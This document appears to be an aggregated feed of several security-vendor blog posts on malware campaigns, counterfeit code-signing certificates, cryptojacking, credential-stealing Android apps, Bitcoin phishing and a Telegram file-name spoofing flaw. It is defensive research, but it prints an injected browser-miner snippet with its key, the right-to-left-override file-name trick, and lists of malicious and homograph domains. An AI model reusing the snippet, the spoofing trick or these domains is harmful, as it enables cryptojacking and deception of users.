Drive-by download campaign targets Chinese websites, experiments with exploits

During our web crawls we sometimes come across bizarre findings or patterns we haven’t seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.

For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.

The campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser’s address bar shows gusto-delivery[.]com, there are several injected layers that expose visitors to unwanted code and malware.

For instance, we find a reference to a Coinhive clone:

var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {
 threads: navigator.hardwareConcurrency,
 autoThreads: false,
 throttle: 0.2,
 forceASMJS: false

We are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at ppoi[.]org) only takes a 10 percent commission as opposed to 30 percent for Coinhive.


I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this
rate is fixed, regardless of actual blocks found and the luck involved finding them. 
We keep 10% for us to operate this service and to (hopefully) turn a profit.

Finally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:

On top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.


This old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published here and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.


This is a Flash Player vulnerability affecting Flash up to version, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.


Finally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.

The final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.


Although we see the use of several exploits, we cannot call this an exploit kit—not even an amateur one. Indeed, the domain serving the exploits appears to be static and the URIs are always the same.

Regardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.

Indicators of compromise

Malicious redirection


Exploit domain and IP







The post Drive-by download campaign targets Chinese websites, experiments with exploits appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

The Use of Counterfeit Code Signing Certificates Is on the Rise

Insikt Group

Click here to download the complete analysis as a PDF.

Key Judgements

  • We observed the earliest use of stolen code certificates in 2011, but it was not until 2015 that code signing certificates became widely available in the criminal underground.
  • Insikt Group identified four well-known vendors of such products since 2011; only two vendors are currently soliciting their services to Russian-speaking hackers.
  • The most affordable version of a code signing certificate costs $299, but the most comprehensive Extended Validation (EV) certificate with a SmartScreen reputation rating is listed for $1,599. The starting price of a domain name registration with EV SSL certificate is $349.
  • All certificates are issued by reputable companies, such as Comodo, Thawte, and Symantec, and have proved to be extremely effective in malware obfuscation. We believe that legitimate business owners are unaware that their data was used in the illicit activities.
  • Network security appliances performing deep packet inspection become less effective when legitimate (legitimate certificate) SSL/TLS traffic is initiated by a malicious implant. Netflow (packet headers) analysis is an important control toward reducing risk, as host-based controls may also be rendered ineffective by legitimate code signing certificates.

Executive Summary

In 2017, security researchers around the world started seeing a sudden increase in code signing certificates being used as a layered obfuscation technique for malicious payload distribution campaigns. Recorded Future’s Insikt Group investigated the criminal underground and identified vendors currently offering both code signing certificates and domain name registration with accompanying SSL certificates.

Contrary to a common belief that the security certificates circulating in the criminal underground are stolen from legitimate owners prior to being used in nefarious campaigns, we confirmed with a high degree of certainty that the certificates are created for a specific buyer per request only and are registered using stolen corporate identities, making traditional network security appliances less effective.


For a number of years, security researchers have warned the public about cybercriminals using counterfeited code signing certificates in their efforts to obfuscate malicious payloads, but only a handful of times were these underground services researched thoroughly.

As antivirus software detection capabilities improved, the standard tactics such as payload encryption were no longer sufficient. It became more challenging to sustain a file’s effectiveness for extended periods of time, sometimes requiring daily “cleaning” of executable files. As a result, cybercriminals needed a more comprehensive security approach and began experimenting with a secondary protection layer, signing payload files with the legitimately issued security certificates.

Although it was known that threat actors were using counterfeit certificates as early as 2011, it was not until 2015 that the first offerings surfaced in the underground.

Threat Analysis

One of the first vendors to offer counterfeit code signing certificates was known as C@T, a member of a prolific hacking messaging board. In March 2015, C@T offered for sale a Microsoft Authenticode capable of signing 32/64b versions of various executable files, as well as Microsoft Office, Microsoft VBA, Netscape Object Signing, and Marimba Channel Signing documents, and supported Silverlight 4 applications. Additionally, Apple code signing certificates were also available.

In his advertisement, C@T explained that the certificates are registered under legitimate corporations and issued by Comodo, Thawte, and Symantec — the largest and most respected issuers. The seller indicated that each certificate is unique and will only be assigned to a single buyer, which could be easily verified via According to C@T, the success rate of payload installations from signed files increases by 30 to 50 percent, and he even admitted to selling over 60 certificates in less than six months.

During that time, C@T saw sales dwindle and failed to appeal to a broad client base because of prohibitive costs, in some cases demanding upwards of $1,000 per certificate, when other more affordable and reliable payload obfuscation methods were still available.

Timeline of Criminal Activity Involving Counterfeit Code Signing Certificates

The activity of criminal vendors of counterfeit code signing certificates in the dark web.

Approximately two years later, three new actors began offering their services primarily in the Eastern European underground. While one actor eventually moved on to other illicit operations, the remaining two actors still actively supply counterfeit certificates to Russian- speaking actors.

The second actor specializes in Class 3 certificates, which do not include Extended Validation (EV) assurance and are available for the price of $600, whereas the third actor offers the broadest range of products.

Standard code signing certificates issued by Comodo that do not include SmartScreen reputation rating cost $295. A buyer interested in the most trusted version of an EV certificate issued by Symantec would have to pay $1,599, a 230 percent premium compared to the price of the authentic certificate. For those seeking to purchase in bulk, fully authenticated domains with EV SSL encryption and code signing capabilities could also be arranged for $1,799.

Product List

Product listing advertised by a threat actor.

According to the information provided by both sellers during a private conversation, to guarantee the issuance and lifespan of the products, all certificates are registered using the information of real corporations. With a high degree of confidence, we believe that the legitimate business owners are unaware that their data was used in the illicit activities. It is important to note that all certificates are created for each buyer individually with the average delivery time of two to four days.

Technical Analysis

Both actors have acknowledged that due to the advanced security metrics employed in the Chrome browser — it is considered to be providing excellent security — clients must expect significantly lower levels of success penetrations compared to Firefox, Internet Explorer, and Safari browsers.

Insikt Group successfully convinced a vendor to conduct a trial, signing a provided payload executable of a previously unreported Remote Access Trojan (RAT) with a recently issued Comodo certificate. Despite that test-subject files were encrypted beforehand, the results of the test demonstrated the superior effectiveness of code signed versions.

While only eight antivirus providers successfully detected the encrypted version of the payload, only two of them were effective against the code signed version. More disturbing results surfaced after the same test was conducted for a non-resident version of the payload. In that case, only six companies were capable of detecting an encrypted version, and only Endgame protection successfully recognized the file as malicious.


Network security appliances performing deep packet inspection become less effective when legitimate (legitimate certificate) SSL/TLS traffic is initiated by a malicious implant. Netflow (packet headers) analysis is an important control toward reducing risk, as host-based controls may also be rendered ineffective by legitimate code signing certificates.

Unlike ordinary crypting services readily available at $10-$30 per each encryption, we do not anticipate counterfeit certificates to become a mainstream staple of cybercrime due to its prohibitive cost. However, undoubtedly, more sophisticated actors and nation-state actors who are engaged in less widespread and more targeted attacks will continue using fake code signing and SSL certificates in their operations.

To view screenshots associated with this analysis, download the appendix.

The post The Use of Counterfeit Code Signing Certificates Is on the Rise appeared first on Recorded Future.

Go to Source
Author: Andrei Barysevich

Sofacy APT turns to the East

We at Kaspersky Lab monitor, report, and protect against a lot of threat actors, some of which are known internationally and sometimes featured in the news. It doesn’t matter which language the threat actor speaks, it’s our duty to know about it, investigate it, and protect our customers from it.

One of the most active threat actors is a Russian-speaking APT called Sofacy, also known as APT28, Fancy Bear, and Tsar Team, infamous for its spear phishing campaigns and cyberespionage activities. In 2017, it shifted focus in a way worthy of an update here.

We’ve been watching Sofacy since 2011 and are pretty familiar with the instruments and tactics the threat actor is using. Last year, the main change was that it moved beyond the NATO countries it was actively spear phishing in the beginning of the year and onto countries in the Middle East and Asia — and farther — in Q2 2017. Earlier, Sofacy also targeted the Olympic Games, the World Anti-Doping Agency (WADA), and the Court of Arbitration for Sports (CAS).

Sofacy uses different tools for different target profiles. For example, in early 2017 a campaign called Dealer’s Choice targeted mostly military and diplomatic organizations (mainly in NATO countries and Ukraine); later, the hackers were using two other tools, which we call Zebrocy and SPLM, to target companies of different profiles including science and engineering centers and press services. Both Zebrocy and SPLM were heavily modified last year, with SPLM (which also goes by the name Chopsticks) becoming modular and using encrypted communications.

The usual infection scheme starts with a spear-phishing letter containing a file with a script that downloads the payload. Sofacy is known for finding and exploiting zero-day vulnerabilities and using those exploits to deliver the payload. The threat actor maintains a high level of operational security and really focuses on making its malware harder to detect — which, of course, makes it harder to investigate.

In cases of highly sophisticated targeted campaigns such as Sofacy, thorough incident investigation is vital. It will allow you to figure out what information malefactors were after, understand their motives, and detect the presence of any sleeping implants.

To do that, your security system needs not only advanced protective solutions but also an endpoint detection and response system. Such a system detects threats at early stages, and helps analyze events that predated the incident. Having skilled experts doesn’t hurt, either. As a solution, we offer the Threat Management and Defense platform, which incorporates Kaspersky Anti Targeted Attack, Kaspersky Endpoint Detection and Response, and expert services.

You can find more information on the threat actor’s activity in 2017, including technical details, on Securelist. Further, at the start of this year, our researchers found some interesting shifts in Sofacy’s behavior that we will highlight at the SAS 2018 conference. If you are interested in APTs and building defense against them, don’t forget to get a ticket — or at least visit our blogs frequently during the SAS.

Go to Source
Author: John Snow

Security Alert: Attackers Using Script Injection to Spread Bitcoin-Mining Malware

Security researchers recently analyzed various spam campaigns and discovered a new one related to Bitcoin cryptocurrency that is impacting a lot of websites.

For the past months, Bitcoin gained a lot of attention and reached high price levels, followed by various fluctuations. The process of mining consists in verifying other Bitcoin transactions, which users are rewarded for, and is supposed to keep transactions safe and secure.

How the infection is spread

During this spam campaign, online criminals try to inject a malicious script into different WordPress, Joomla, and jBoss legitimate websites. They do this by hiding the unwanted script on the embed site with the main purpose to create a binary file. With the help of this binary file, hackers will misuse the PC’s CPU to access users’ computers to mine Bitcoin.

Basically, when visitors access a website that hosts the malicious script, their PC’s CPU is used to mine Bitcoin currency for cyber attackers. It will also collect information from the Bitcoin wallet which has been installed on the compromised machine.

Here is how the malicious script is injected with a reference to the following site (sanitized for your own protection)

http: // online-game-18 [.] xyz /? c = 41-149-20180219062557833d27348 & pst = 2 & key = [uniktID]

The package file provided to the potential victims looks like a game for adults named “The # 1 Adult Game – Free to Play” and containing an executable filename “setup_sex_game.exe”

The binary package is digitally certified by Comodo with the following details:

Status Valid
Issuer COMODO RSA Code Signing CA
Valid from 1:00 AM 2/15/2018 to 12:59 AM 2/16/2019
Valid Use Code Signing
Algorithm sha256RSA
Thumbprint 9FB7FD71BB7DA9C256E872CB56E3808E811990BB
Serial number 66 CA 14 17 72 9E 0A BB D8 F9 80 08 A3 97 4B B4

The above domain is hosted on this server (sanitized for your own protection) 212.224.118 [.] 40. Security researchers discovered that it’s the same server linked with other Bitcoin mining domains, including the same offer of a free game. Here’s a list of malicious domains:

action8 [.] xyz
biggame1 [.] xyz
updflash [.] xyz
Best-game [.] xyz
game18plus [.] xyz
need action [.] xyz
Win32 flash [.] xyz
update-flash [.] xyz
Update Flash Player [.] xyz

Heimdal Security proactively blocked all infected sites, so all Heimdal PRO and Heimdal CORP users are protected.

According to VirusTotal, only 16 antivirus engines out of 68 managed to detect the binary package file at the time we write this article.

VirusTotal Bitcoin miner

How to protect yourself against malicious script injections

The main issue with the Bitcoin Mining malware is that it acts like a fileless malware and usually go undetected by traditional antivirus products. Injecting a malicious script, hackers can redirect users to a compromised site and steal users’ sensitive data. This is why we strongly recommend users to:

  • Apply all the updates available for your apps (especially the most vulnerable ones: Flash and Java, browsers), software programs and system. Do NOT postpone and neglect to keep your system fully patched. Keeping OS up to date is the best thing users can do for their safety.
  • Be very careful when clicking on suspicious links or websites and always check if the web page’s URL is genuine;
  • Make sure you access sites that use a security certificate or HTTPS to avoid malware infection;
  • Install a reliable antivirus program installed on your computer to protect your valuable data from online threats;
  • Consider adding multiple layers of protection and use also a proactive cyber security software solution;
  • Probably one of the best security measure everyone can use is to learn how to easily detect various online threats. We recommend reading these free educational resources to gain more knowledge in the cybersecurity industry.

*This article features cyber intelligence provided by CSIS Security Group researchers.

Go to Source
Author: Ioana Rijnetu

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of TechniquesUsed Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing
CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists
in the WebLogic Server Security Service (WLS Security) in Oracle
WebLogic Server versions and prior, and attackers can
exploit it to remotely execute arbitrary code. Oracle released a Critical
Patch Update
that reportedly fixes this vulnerability. Users who
failed to patch their systems may find themselves mining
cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the
exploitation of CVE-2017-10271 following the public posting of proof
of concept code in December 2017. Attackers leveraged this
vulnerability to subsequently download cryptocurrency miners in victim
environments. The recent cryptocurrency boom has resulted in a growing
number of operations – employing diverse tactics – aimed at stealing
cryptocurrencies. The idea that these cryptocurrency mining operations
are less risky, along with the potentially nice profits, could lead
cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we’ve observed involve exploiting CVE-2017-10271,
leveraging PowerShell to download the miner directly onto the victim’s
system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script,
instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script
tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks
related to other miners

In Figure 4, the cryptominer creates a
scheduled task with name “Update service for Oracle
”.  In Figure 5, a different variant deletes this task
and other similar tasks after creating its own, “Update service for
Oracle productsa

From this, it’s quite clear that
different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching
certain strings

Similar to scheduled tasks deletion,
certain known mining processes are also terminated (Figure 6 and
Figure 7).

  • Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with
different flags to connect to mining pools (Figure 8). Some of the
other observed flags are: -a for algorithm, -k for keepalive to
prevent timeout, -o for URL of mining server, -u for wallet key, -p
for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are
limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using
Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s
environment using dumped Windows credentials and the EternalBlue vulnerability

The malware checks whether its running on a 32-bit or 64-bit system
to determine which PowerShell script to grab from the command and
control (C2) server. It looks at every network adapter, aggregating
all destination IPs of established non-loopback network connections.
Every IP address is then tested with extracted credentials and a
credential-based execution of PowerShell is attempted that downloads
and executes the malware from the C2 server on the target machine.
This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash
attack with the NTLM information derived from Mimikatz in order to
download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the
attacker via an HTTP GET request to:

If the lateral movement with credentials fails, then the malware
uses PingCastle MS17-010 scanner (PingCastle is a French Active
Directory security tool) to scan that particular host to determine if
its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware
generates random IPs and uses the same combination of PingCastle and
EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver
shell scripts (Figure 10) that have functionality similar to the
PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching
certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used
to find processes that have high CPU usage and terminate them. This
terminates other potential miners and maximizes the utilization of resources.


Use of cryptocurrency mining malware is a popular tactic leveraged
by financially-motivated cyber criminals to make money from victims.
We’ve observed one threat actor mining around 1 XMR/day, demonstrating
the potential profitability and reason behind the recent rise in such
attacks. Additionally, these operations may be perceived as less risky
when compared to ransomware operations, since victims may not even
know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using
various tactics, typically in an opportunistic and indiscriminate
manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by
cryptominer tricks. FireEye HX detects these threats at the initial
level of the attack cycle, when the attackers attempt to deliver the
first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the
following indicators:

Detection Name

Indicators of Compromise

MD5 Name
3421A769308D39D4E9C7E8CAECAF7FC4 cranberry.exe/logic.exe
B3A831BFA590274902C77B6C7D4C31AE xmrig.exe/yam.exe
26404FEDE71F3F713175A3A3CEBC619B 1.ps1
D3D10FAA69A10AC754E3B7DDE9178C22 2.ps1
9C91B5CF6ECED54ABB82D1050C5893F2 info3.ps1
3AAD3FABF29F9DF65DCBD0F308FF0FA8 info6.ps1
933633F2ACFC5909C83F5C73B6FC97CC lower.css
B47DAF937897043745DF81F32B9D7565 lib.css
3542AC729035C0F3DB186DDF2178B6A0 bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their
help in the analysis.

Go to Source
Author: Rakesh Sharma

Android Malware Harvests Facebook Account Details

New Fakeapp variants log into Facebook accounts to harvest user credentials directly from victims’ devices.

Recently, there have been reports of mobile threats stealing Facebook login credentials, such as user names and passwords. We’ve encountered new Android malware (detected as Android.Fakeapp) that takes a more aggressive approach: logging into Facebook accounts and harvesting account details directly from victims’ devices. The majority of the victims are located in the Asia-Pacific region.

The malware we’ve encountered was sourced from third-party markets. The apps target English speakers.

Once installed, the malicious app immediately hides itself from the home screen, leaving only a service running in the background. This service takes the following steps to steal details from a Facebook user’s account:
  • It checks for a target Facebook account by submitting the International Mobile Equipment Identity (IMEI) to the command and control (C&C) server.
  • If no account can be collected, it verifies that the app is installed on the device.
  • It then launches a spoofed Facebook login user interface (UI) to steal user credentials.
  • It periodically displays this login UI until credentials are successfully collected.
Figure 1. Spoofed Facebook login dialog
Figure 1. Spoofed Facebook login dialog

Using JavaScript from a hidden WebView, the threat silently logs into the compromised Facebook account. The malware hides the WebView by setting the display to be almost completely transparent (Figure 2).

Figure 2. Setting the display to be transparent
Figure 2. Setting the display to be transparent

It then ensures that a CAPTCHA isn’t presented. If it is, it sends the event to the C&C server, clears caches and cookies, and retries later.

Figure 3. Backing out of a CAPTCHA challenge
Figure 3. Backing out of a CAPTCHA challenge

Once the malware is logged into the Facebook page, it can leverage a wide range of capabilities to follow links and scrape the personal data of the victim and their friends, sending it back to the C&C server. This includes:

  • General top-level data: Facebook account, user, password, device IMEI
  • Profile: Work, education, location, contacts, basic info, nicknames, relationships, family, bio
  • Activities: Check in, events, friends, groups, likes, pages, posts

The functionality that crawls the Facebook page has a surprising level of sophistication. The crawler has the ability to use the search functionality on Facebook and collect the results. Additionally, to harvest information that is shown using dynamic web techniques, the crawler will scroll the page and pull content via Ajax calls (Figures 4 and 5).

Figure 4. Scrolling the page
Figure 4. Scrolling the page
Figure 5. Collecting dynamic contact with Ajax
Figure 5. Collecting dynamic contact with Ajax

We advise users to follow these best practices to stay protected from mobile threats:

  • Keep your software up to date
  • Refrain from downloading apps from unfamiliar sites and only install apps from trusted sources
  • Pay close attention to the permissions requested by apps
  • Install a suitable mobile security app, such as Norton, to protect your device and data
  • Make frequent backups of important data

Go to Source
Author: Martin Zhang, Shaun Aimoto

COINHOARDER: Tracking a Ukrainian Bitcoin Phishing Ring DNS Style

This post is authored by Jeremiah O’Connor and Dave Maynor with contributions from Artsiom Holub and Austin McBride. 


Cisco has been tracking a bitcoin theft campaign for over 6 months. The campaign was discovered internally and researched with the aid of an intelligence sharing partnership with Ukraine Cyberpolice. The campaign was very simple and after initial setup the attackers needed only to continue purchasing Google AdWords to ensure a steady stream of victims. This campaign targeted specific geographic regions and allowed the attackers to amass millions in revenue through the theft of cryptocurrency from victims. This campaign demonstrates just how lucrative these sorts of malicious attacks can be for cybercriminals. Additionally, the revenue generated by these sorts of attacks, can then be reinvested into other cybercriminal operations.


On February 24, 2017, Cisco observed a massive phishing campaign hosted in Ukraine targeting the popular Bitcoin wallet site with a client request magnitude of over 200,000 client queries. This campaign was unique in that adversaries leveraged Google Adwords to poison user search results in order to steal users’ wallets. Since Cisco observed this technique, it has become increasingly common in the wild with attackers targeting many different crypto wallets and exchanges via malicious ads.

Cisco identified an attack pattern in which the threat actors behind the operation would establish a “gateway” phishing link that would appear in search results among Google Ads. When searching for crypto-related keywords such as “blockchain” or “bitcoin wallet,” the spoofed links would appear at the top of search results. When clicked, the link would redirect to a “lander” page and serve phishing content in the native language of the geographic region of the victim’s IP address.


The reach of these poisoned ads can be seen when analyzing DNS query data. In February 2017, Cisco observed spikes in DNS queries for the fake cryptocurrency websites where upwards of 200,000 queries per hour can be seen during the time window the ad was displayed. Here are two examples.


DNS Statistics for block-clain[.]info

The domain block-clain[.]info was used as the initial “gateway” victims would first visit. Victims would immediately be redirected to blockchalna[.]info, the landing page where the actual phishing content was hosted. These fraudulent sites are mostly hosted on bulletproof hosting providers based in Europe.

Here is what the actual lander phishing site looked like. Note how similar and convincing it is compared to a real site, with the exception of the URL:


After discovering these domains and the activity on Google Adwords, Cisco implemented a system to flag similar domains as malicious. This resulted in DNS requests being blocked to said domains. Additionally, Cisco researchers were able to track and monitor related networks and info, such as WHOIS registrant data.

This information allowed Cisco to use DNS graph traversal techniques to uncover other phishing domains associated with the initial site. In this example, we can see the registrant dsshvxcnbbu@yandex[.]ru, which is also associated with many other phishing sites:

Cisco also monitored the networks these domains are hosted on. Here is a snapshot of 2 of the recently active IP addresses for this campaign, and, and the ASN associated with these domains, Highload Systems, in Ukraine.

We can see the Second Level Domain (SLD) strings in these domains follow a similar pattern of targeting with many permutations of the string “blockchain”, along with co-occurrences of “http”, “https”, “wallet” in the SLD string. Here is a graph visualization of the domains on these infrastructures:


One of the most interesting facets to these attacks are the geographic regions of the victims. Using data from Umbrella Client Requester Distribution queries to these malicious domains, we can see a significant number of DNS resolution requests coming from countries such as Nigeria, Ghana, Estonia and many more.

This threat actors appears to be standing up phishing pages to target potential victims African countries and other developing nations where banking can be more difficult, and local currencies much more unstable compared to the digital asset. Additionally, attackers have taken notice that targeting users in countries whose first language is not English make for potentially easier targets. Based on the number of queries, this campaign is one of the biggest targeting to date. has been very proactive in supporting users. Kristov Atlas, a security and privacy engineer at, has even gone so far to say “phishing is one of our top areas of concern in protecting our users.”


Cisco has evidence the COINHOARDER group has been actively pilfering Bitcoin since at least 2015. Based on our findings, we estimate this group has stolen tens of millions of USD in cryptocurrency. While working with Ukraine law enforcement, we were able to identify the attackers’ Bitcoin wallet addresses and thus, we could track their activity for the period of time between September 2017 to December 2017. In this period alone, we quantified around $10M was stolen.In one specific run, they made $2M within 3.5 week period. Here we have a screenshot of one of the wallets, 19yAR4yvGcKV3SXUQhKnhi43m4bCUhSPc, related to this actor group, which has received a total of $1,894,433.09.

While identifying the individual who owns a specific wallet is extremely difficult, we still can look for open source intelligence surrounding the wallet. In December 2017, Cisco found posts on Reddit and Stack Exchange with addresses associated with stolen funds from this campaign, 13wahvu3FP8LK8P51UmEkhBUhyC7mzkrn3.

The wallet address in the screenshot above was also mentioned in a Reddit post in October 2017.

Based on our findings associated with this syndicate, we estimate the COINHOARDER group to have netted over $50M dollars over the past three years. It is important to note that the price of Bitcoin has shot up drastically over 2017, starting around $1,000 in January and hitting a high point just under $20,000 in December. While criminals were able to profit from this, it also adds a new level of complexity for criminals to convert their cryptocurrency funds to a fiat currency like US dollars. The historic price of Bitcoin during the height of this campaign would have made it very difficult to move these ill-gotten finances easily.


Ukraine is a hotbed for many types of attacks and a home for known bulletproof hosting providers. In the past year, Cisco has witnessed a substantial rise in financial motivated campaigns coming from and targeting this region. One of Cisco’s goals is to collaborate with countries worldwide and use our global visibility on attacks to asses their security posture and help improve it.

Some other observed IPs are and, which host domains targeting many currencies using IDN and SSL certs and are hosted on VServer in Ukraine. We also observed AS 58271 hosting multiple search engine poisoning attacks on Google and Bing:


Cisco has observed this threat actor evolve over time. Not only have we seen the COINHOARDER group abuse Google Adwords to generate traffic to their phishing servers, but we have also observed this group evolve to make their sites appear more legitimate. A few months after we began tracking this particular group, we observed them starting to use SSL certs issued by Cloudflare and Let’s Encrypt. SSL certificate abuse has been a rising trend among phishing campaigns in general. Below is an example of a wildcard SSL certificate issued by Cloudflare for the domain bockchain[.]info.

Here is an example of one of these SSL certificates issued by Let’s Encrypt associated with this campaign and the site blockcharin[.]info.

The COINHOARDER group has made heavy use of typosquatting and brand spoofing in conjunction SSL signed phishing sites in order to appear convincing. We have also observed the threat actors using internationalized domain names. These domains are used in what are called homograph attacks, where an international letter or symbol looks very similar to one in English. Here are some examples from this campaign.

The Punycode (internationalized) version is on the left, the translated (homographic) version on the right:

xn--blockchan-d5a[.]com → blockchaìn[.]com

xn--blokchan-i2a[.]info → blokchaín[.]info

These attacks can be nearly impossible to spot with the human eye, especially when delivered on a mobile platform and using these techniques helps coax users into handing over their funds.


Crypto assets have proven to be a new, valuable financial commodity targeted by varying degrees of cyber criminals. In 2017, we observed phishers advance their tactics by utilizing new attack vectors such as Google Adwords combined with the use of IDNs and rogue SSL certificates to improve their probability of success, and generate millions in profit.

What is clear from the COINHOARDER campaign is that cryptocurrency phishing via Google Adwords is a lucrative attack on users worldwide. Phishers are significantly improving their attack techniques by moving to SSL and employing the use of IDNs to fool victims into handing over their credentials. We can expect to see more of these realistic looking phishes with Let’s Encrypt releasing full wildcard certificate support at the end of this month. Cisco will continue to monitor the landscape and coordinate with international law enforcement teams in 2018 to help protect users and organizations.


The following IP address are known to have been used in these phishing attacks:


Go to Source
Author: Talos Group

Hackers Exploit ‘Telegram Messenger’ Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash.

The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram messaging software.

The flaw has actively been exploited in the wild since at least March 2017 by attackers who tricked victims into downloading malicious software onto their PCs that used their CPU power to mine cryptocurrencies or serve as a backdoor for attackers to remotely control the affected machine, according to a blogpost on Securelist.

Here’s How Telegram Vulnerability Works

The vulnerability resides in the way Telegram Windows client handles the RLO (right-to-left override) Unicode character (U+202E), which is used for coding languages that are written from right to left, like Arabic or Hebrew.

According to Kaspersky Lab, the malware creators used a hidden RLO Unicode character in the file name that reversed the order of the characters, thus renaming the file itself, and send it to Telegram users.

For example, when an attacker sends a file named “photo_high_re*U+202E*gnp.js” in a message to a Telegram user, the file’s name rendered on the users’ screen flipping the last part.

Therefore, the Telegram user will see an incoming PNG image file (as shown in the below image) instead of a JavaScript file, misleading into downloading malicious files disguised as the image.

“As a result, users downloaded hidden malware which was then installed on their computers,” Kaspersky says in its press release published today.

Kaspersky Lab reported the vulnerability to Telegram and the company has since patched the vulnerability in its products, as the Russian security firm said: “at the time of publication, the zero-day flaw has not since been observed in messenger’s products.”

Hackers Used Telegram to Infect PCs with Cryptocurrency Miners


During the analysis, Kaspersky researchers found several scenarios of zero-day exploitation in the wild by threat actors. Primarily, the flaw was actively exploited to deliver cryptocurrency mining malware, which uses the victim’s PC computing power to mine different types of cryptocurrency including Monero, Zcash, Fantomcoin, and others.

While analyzing the servers of malicious actors, the researchers also found archives containing a Telegram’s local cache that had been stolen from victims.

In another case, cybercriminals successfully exploited the vulnerability to install a backdoor trojan that used the Telegram API as a command and control protocol, allowing hackers to gain remote access to the victim’s computer.

“After installation, it started to operate in a silent mode, which allowed the threat actor to remain unnoticed in the network and execute different commands including the further installation of spyware tools,” the firm added.

Firsh believes the zero-day vulnerability was exploited only by Russian cybercriminals, as “all the exploitation cases that [the researchers] detected occurring in Russia,” and a lot of artifacts pointed towards Russian cybercriminals.

The best way to protect yourself from such attacks is not to download or open files from unknown or untrusted sources.

The security firm also recommended users to avoid sharing any sensitive personal information in messaging apps and make sure to have a good antivirus software from reliable company installed on your systems.

Go to Source